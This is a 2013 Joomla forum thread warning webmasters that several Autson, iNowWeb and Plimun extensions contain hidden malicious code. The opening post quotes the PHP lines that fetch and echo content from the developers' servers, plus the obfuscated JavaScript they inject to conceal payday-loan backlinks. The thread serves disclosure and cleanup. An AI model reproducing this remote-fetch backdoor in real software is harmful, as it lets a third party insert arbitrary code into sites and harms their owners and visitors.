Page 1 of 1

Remove extensions from Autson/iNowWeb/Plimun - Malicious !!

Posted: Sat Mar 23, 2013 12:45 am
by alphaprodigy
This is a notice to all developers / webmasters. Check your site to see if you have any extensions installed from Autson.com AKA iNowWeb.com AKA Plimun.com (possibly more).

Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and do can whatever they like to your website. This is a huge security vulnerability. As such, the extensions have been removed from the JED, but they are still on tens of thousands of websites.

The most popular vulnerable extensions are:

- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).

- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.

- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.

- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.

- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).

The hidden backlinks are being inserted via the following code:

Code: Select all

<?php 
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>
or

Code: Select all

<?php 
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>
etc..The file on there server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the php file.


This is what that code is inserting into the site:

Code: Select all

<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
		
<p class="dnn"By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
or

Code: Select all

<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>

<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
Additional extensions from these developers that are possibly vulnerable as well:

iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show

Plimun.com:
- Plimun Twitter Ticker
- Twitter Show

I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displayed hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr

So what can we do to stop these spammers/hackers?

1. Remove the extensions from your or your clients websites (or just remove the malicious code).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to . They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are:

Code: Select all

autson.com , inowweb.com , plimun.com
The actions of developers like this adversely affects the entire Joomla community and we must do something to stop it.

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Sat Mar 23, 2013 5:10 am
by mandville
It is actions like this that get a dev banned from the Jed. This dev was banned long ago

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Sat Mar 23, 2013 7:14 am
by alphaprodigy
Yes, the developer was banned, but it went unnoticed for so long that now there are over 20,000 infected websites out there. I made this thread to hopefully bring more attention to the vulnerable extensions mentioned above so that the affected webmasters can be alerted to the problem and act accordingly. I know its unrealistic to reach every webmaster, but every little bit helps.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Wed Mar 27, 2013 3:12 pm
by delhidjinn
Thank you for this warning. Two of my most important websites were infected via the extension AddThis. I have gone ahead and removed this extension as well as the Facebook slider.

Much obliged to you for saving my websites.

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Wed Mar 27, 2013 3:21 pm
by Webdongle
alphaprodigy wrote:Yes, the developer was banned, but it went unnoticed for so long ...
There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Wed Mar 27, 2013 4:21 pm
by mandville
Also to note that occasionally a developer will upload a clean extension to the jed for checking and then once the hits start rolling in, upload a dodgy package to their website.

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Wed Mar 27, 2013 4:44 pm
by brian
Webdongle wrote:
alphaprodigy wrote:Yes, the developer was banned, but it went unnoticed for so long ...
There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?
The JED can only react to reports. I personally spotted this issue and reported it to the JED who took action immediately

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Wed Mar 27, 2013 5:05 pm
by Webdongle
brian wrote:...
The JED can only react to reports. ...
I recall a post where it was stated that extensions were checked for malicious code in an extension before it was accepted ?

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Wed Mar 27, 2013 5:08 pm
by brian
Sadly its not possible to ensure that the version uploaded is the same as the version that is available for download. Not is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Wed Mar 27, 2013 5:53 pm
by Webdongle
brian wrote:... Not is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release
That's a good point ... pity there are not more people checking.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Thu Mar 28, 2013 2:38 am
by delhidjinn
I've have become economical in the use of Joomla extensions. Especially since I have upgraded to Joomla 2.5. The migration was a headache as many extensions either had been discontinued or the upgrade was not available.

Plus my most valuable site was hacked due to doorways in certain extensions. Even paid extensions.

Joomla is a robust platform. With almost a minimal use of extensions, I have brought my expectations down and do not opt for the fancy stuff immediately.

Still, even then I had been beguiled into believing that some extensions are okay, which it seems they are not.

Now days I am very strict in incorporating extensions in my website. Some of extensions I cannot do without, and have to use them.

I believe, eventually in a few years time, Joomla would have most of the basic requirements of a website built in native.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Mon Apr 08, 2013 11:19 am
by jfdutoit
Wow, I'm quite surprised that someone would do so much effort to contact and inform website owners about these malicious extensions.

I received a random email from a certain Tom E informing me of Add-This, etc.

Although I grateful that he notified me, I surprised that someone would go to such great lengths to let me know. My website (ezywebsites.co.za) is one of the 20 000 mentioned in the first post.

Yet. as soon as I get a chance, I'll check all my clients.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 09, 2013 4:00 pm
by Vering
You have my greatest thanks, alphaprodigy. I've immediately remove the malicious code from the Autson Slideshow.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 09, 2013 11:11 pm
by suklamc
Additional Behaviour noticed with [spam] for Joomla! :

The extension was used/evaluated for use for website(s) by me/us, and some peculiar behaviour was noticed.

1> The above mentioned extension used to load an unsecure code. (We accidentally discovered it when we enabled site-wide SSL/HTTPS a few months ago). when Linkedin (and maybe social options were selected), a nasty browser warning (for loading unsecure content) used to be thrown up. The issue was not investigated further (it was easier to find an alternative extension)

2>Another aspect worth mentioning the above mentioned backlinks are not loaded in some configurations (but is definitely loaded when LinkedIN is selected), which suggests there may be more lines of code controlling the backlink's behaviour.

Hence I suggest you rephrase/remove (or just remove the malicious code)

as this may give a false sense of security that the issue has been fixed by removing a few lines of code (and something else may get missed)

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Sun Apr 14, 2013 9:07 am
by luigipepe
I also received an email from someone at a gmail account warning me that my site was infected and pointing me to this thread. The code was there so I disabled and uninstalled the addthis extension that was causing the problem and the code is now gone. THANK YOU SO MUCH for letting me know, much appreciated!

Now does anyone know of a reliable free alternative to the addthis social sharing extension? This has put me off a little and I'm not sure what to choose anymore...

Luigi

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 16, 2013 10:07 am
by mark4740
Thanks for the email,I seem to have removed the script and deleted the plugin, Seems to only have been on my home page as i can`t see it on any of the other page sources (i hope). Does anyone know a safe plugin for the twitter/facebook/google icons on my website so i can tweet/like post new products i list?

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 16, 2013 10:02 pm
by mark4740
i'm surprised There has not been more comments on this, I have had the rogue plugin on my site fro over 10 months, with over 20,000 sites affected thought this topic would be bigger than it is?

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 16, 2013 11:35 pm
by mandville
mark4740 wrote:i'm surprised There has not been more comments on this, I have had the rogue plugin on my site fro over 10 months, with over 20,000 sites affected thought this topic would be bigger than it is?
You are relying on the belief that people feel compelled to come here and say "me2" "+1" "i owe you my first born"
the OP did their apparent civic duty informing people to the issue, this is not the proverbial field of dreams.
people downloaded and installed the extensions, got caught, got notified and hopefully removed it. End of most peoples stories regarding this developer

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Sat Apr 20, 2013 3:36 am
by edirect
I would like to say thanks to whomever tipped me off. I sent them an email, but maybe they will see it here.

Anyway, thank you.

jw

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Sat Apr 27, 2013 4:06 pm
by techdoctor_gr
Thanks for the email, the script have removed when deleted the plugin!

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Mon Feb 03, 2014 5:04 pm
by paulfoos
I got burned by this extension, and found out the hard way, had to search through my site for the vulnerability. I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow. Joomla has almost no control over extensions, unlike other CMSs. I hope to get all my Joomla sites converted to Drupal soon.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Mon Feb 03, 2014 6:22 pm
by mandville
paulfoos wrote: had to search through my site for the vulnerability.
with all due respect please do not confuse "malicious" with "vulnerable"
I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow.
the extensions are listed there http://vel.joomla.org/articles/844-spot ... sions.html Published on Tuesday, 27 August 2013

quite often extensions downloaded from the devs website have "extra" code not in the zip provided to jed for checking